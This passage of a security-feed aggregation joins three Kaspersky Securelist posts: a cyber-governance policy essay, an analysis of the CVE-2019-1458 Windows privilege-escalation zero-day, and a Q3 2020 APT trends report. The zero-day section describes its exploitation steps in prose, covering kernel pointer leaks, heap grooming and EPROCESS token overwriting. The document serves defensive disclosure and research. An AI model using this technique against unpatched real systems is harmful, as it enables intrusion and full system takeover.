Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.\n\n### A lack of global willpower and instruments\n\nFirst of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being [should be guaranteed](<https://www.ohchr.org/EN/ProfessionalInterest/Pages/InternationalLaw.aspx>) a minimum set of rights, that the development of nuclear warheads [should be limited](<https://www.un.org/disarmament/wmd/nuclear/npt/>), if [not](<https://www.newsweek.com/nuclear-weapons-illegal-nobel-prize-679688>) outlawed, or that warfare [should be regulated and overseen](<https://www.icrc.org/en/war-and-law>). These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.\n\nHowever, states have not agreed yet about a binding treaty or about how existing international law applies to keep our digital world at peace. 
There are regular examples demonstrating the major negative effects of cyberattacks on [businesses](<https://www.hydro.com/en/media/on-the-agenda/cyber-attack/>), [nations](<https://www.politico.eu/article/ukraine-cyber-war-frontline-russia-malware-attacks/>) and [citizens](<https://www.kaspersky.com/resource-center/threats/ransomware-examples>) (or "civilians"), and there have been some initiatives to assess how [international law](<https://www.un.org/disarmament/update/the-application-of-international-law-in-cyberspace-state-of-play/>) [would apply](<https://ccdcoe.org/research/tallinn-manual/>) to cyber operations, to [globally](<https://www.interpol.int/Crimes/Cybercrime>) [combat cybercrime](<https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3>), or to [establish norms](<https://www.un.org/disarmament/group-of-governmental-experts/>) of responsible [behavior in cyberspace](<https://www.un.org/disarmament/open-ended-working-group/>) for states. But these initiatives are not coordinated or global enough, they don't actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.\n\n**Are we waiting for more dramatic effects** than those already caused by cyberattacks and cybercrime **to advance cybersecurity with strong governance and regulation instruments**? We believe that, on top of the intrinsic complexity of international cooperation, a **crucial lack of willpower from states is preventing substantial advancement** on cybersecurity.\n\n### Double-dealing\n\nWe believe that lots of players are double-dealing in the digital age. Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. 
As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished – even when they do get exposed. Due to these convenient "cyber features", state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.

But that's not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should be on a common, determined path to cybersecurity, but might rather be guarded jealously for private interests. Private companies such as Kaspersky, however, do their best to proactively [share intelligence](<https://securelist.com>) and [insights on investigations](<https://opentip.kaspersky.com/>) with the community for free.

### Existing regulations are not (global) enough

We also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.

Most of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don't need to. It is often way too easy to access the [devices and networks](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization's very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world. It may not be possible to [become invulnerable](<https://securelist.com/you-cant-be-invulnerable-but-you-can-be-well-protected/73160/>), but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.

On top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and to demonstrate efforts to continuously prevent the malicious use of exposed services.

Digital services and information technologies that unintentionally support malicious cyber activities are – most of the time – developed to bring sound and useful outcomes. However, and for decades, [vulnerability disclosures](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0001>) and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors. We can probably collectively accept that when the first information technologies were [developed](<https://hbr.org/1958/11/management-in-the-1980s>) and [deployed](<https://www.cs.princeton.edu/courses/archive/fall06/cos561/papers/cerf74.pdf>), it wasn't easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential while ignoring existing threats and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from [IoT](<https://securelist.com/on-the-iot-road/91833/>) and [artificial intelligence systems](<https://www.belfercenter.org/publication/AttackingAI>) to [cloud infrastructures](<https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF>), [robotics](<https://securelist.com/robots-social-impact/94431/>) and [new mobile networks](<https://securelist.com/5g-security-for-smart-cities/95057/>). In order to anticipate and prevent malicious exploitation of modern technologies as much as is reasonably possible, we believe that transparent vulnerability management and disclosure practices [need to be developed further](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) by both state and non-state actors, and that technologies or services that are used globally should be assessed by a global community of experts more often.

Last but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path.
This will contribute to a safer world.

## Our call and plans

It is rather unusual for cybersecurity researchers and experts to write on governance matters. We don't pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypotheses and beliefs are actually shared with many others, as demonstrated in the 2020 [Paris Call](<https://pariscall.international/>) consultation [key takeaways](<https://www.kaspersky.com/about/policy-blog/general-cybersecurity/supporting-paris-call>), or [the latest reports](<https://front.un-arm.org/wp-content/uploads/2020/05/200527-oewg-ict-revised-pre-draft.pdf>) from the UN's [OEWG](<https://www.un.org/disarmament/open-ended-working-group/>) on "developments in the field of information and telecommunications in the context of international security", to which [Kaspersky](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) [contributed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-position-paper-on-oewg-second-pre-draft-report-11-june-2020.pdf>).

We feel it is now a good time to send a **call to all governments and international bodies** (and ultimately any citizen) **that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity**, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space. We will never achieve this without determined leadership and a global change towards a better common behavior.

### A cooperative and global governing instrument

We need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation and control, and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.

We believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.

In order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building. It would also ensure that most findings are shared across nations and among cybersecurity players.

This governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.

### A binding treaty of responsible behavior in cyberspace

Nearly [two decades ago](<https://undocs.org/A/RES/58/32>), the UN started to task groups of government experts ([GGE](<https://www.un.org/disarmament/group-of-governmental-experts/>)) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE's debatable results and [limited reach](<https://www.ecfr.eu/article/commentary_time_to_fall_forward_on_cyber_governance>), is the definition of [13 principles](<https://undocs.org/A/RES/73/27>) that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a [voluntary basis](<https://undocs.org/A/70/174>). We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.

We believe that the norms for responsible behavior in cyberspace should be further developed, together with guidance on how these norms should be implemented, and should do better at including non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community – if they remain voluntary, why should the bad guys care?

As far as private companies are concerned, the norm could set transparency and ethics baselines. We must not fail to mention [Kaspersky's own Global Transparency Initiative](<https://www.kaspersky.com/about/transparency>), which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from [the "FIRST" international CSIRTs community](<https://www.first.org/global/sigs/ethics/>) or from [Kaspersky](<https://www.kaspersky.com/blog/vulnerability-disclosure-ethics/35581/>), that tackle the responsible disclosure of security vulnerabilities could also be leveraged as inspiration for private company norms.

### Global regulations and shared means for cybersecurity

In order to tackle the residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent the proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors, to ensure that we all fully recognize our responsibility to keep the digital space secure.

## Conclusion

We deal with cyberattacks of all kinds every day and monitor their context from various sources.
Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we [have once again observed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-annex-on-cyber-threat-landscape-during-covid-19-pandemic-11-june-2020.pdf>) just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.

We believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.

Source: "Researchers call for a determined path to cybersecurity" (ID SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97, Type securelist), published 2020-12-07T10:00:53, modified 2020-12-07T10:00:53, <https://securelist.com/researchers-call-for-a-determined-path-to-cybersecurity/99708/>, CVSS 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P).

Last seen 2019-12-12T11:22:50 Bulletin family blog CVE list CVE-2019-13720, CVE-2019-1458
Description

In November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as to escape the Chrome process sandbox.
The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.

The EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions, because the PE exploit cannot simply start a new process using native WinAPI functions.

The PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader – parsing PE headers, handling imports/exports, etc. After that, code execution is redirected to the entry point of the DLL – the DllEntryPoint function. The PE code then creates a new thread, which is the entry point for the exploit itself, and the main thread simply waits until it stops.

_[EoP exploit used in the attack](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)_

The PE file encapsulating this EoP exploit has the following header:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)

The compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.

Our detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver, and that the EoP exploit was a 0-day because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).

The vulnerability itself is related to window switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.

At the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call; the version is used to find a dozen offsets needed to set up fake kernel GDI objects in memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a bunch of calls to CreateBitmap are performed, the addresses of which are leaked using a handle table array.

_[Triggering exploitable code path](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)_

After that, a few pop-up windows are created and an undocumented syscall, NtUserMessageCall, is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771), which is important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key, and then, using a call to SetBitmapBits, it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.

_[Achieving primitives needed to get arbitrary R/W](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)_

This primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value of an existing system driver process.

_[Overwriting EPROCESS token structure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)_

Kaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic.
These kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack, the sandbox solution can analyze the URL/malicious payload in an isolated environment and detect the EPROCESS token manipulation.

Source: "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium" (ID SECURELIST:4F6413DE862444B5FA0B192AF22A042D, Type securelist), published 2019-12-10T20:00:39, modified 2019-12-10T20:00:39, <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>, CVSS 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C).

Last seen 2020-11-04T08:16:24 Bulletin family blog CVE list CVE-2017-1182, CVE-2019-13720, CVE-2019-1458, CVE-2020-0986, CVE-2020-1380
Description

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports.
They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. 
For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). 
Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. 
So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. 
That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.

PlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.

We discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary, loaded via a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.

On September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider.
In addition, two Malaysian nationals were arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.

## Middle East

In June, we observed new activity by the MuddyWater APT group, involving the use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s that is identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate the execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.

## Southeast Asia and Korean Peninsula

In May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload.
The second sample is a keylogger called Camio, which is an updated version of the Dtrack keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.

We have been tracking LODEINFO, fileless malware used in targeted attacks, since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.

While tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>), where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>).
This discovery also confirms much of the information already discovered during previous investigations, and it confirms that CrimsonRAT is still under active development.

In April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.

In June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019, and have been used in a campaign targeting victims almost exclusively in Pakistan. The authors used the Kotlin programming language and the Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger.
The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.

In mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably also the target of a government web server watering hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.

In May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows.
Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.

On July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions.
We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, and uncovered the method used to access the C2 server.

We have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT and warzoneRAT to its arsenal.

## Other interesting discoveries

Attribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated.
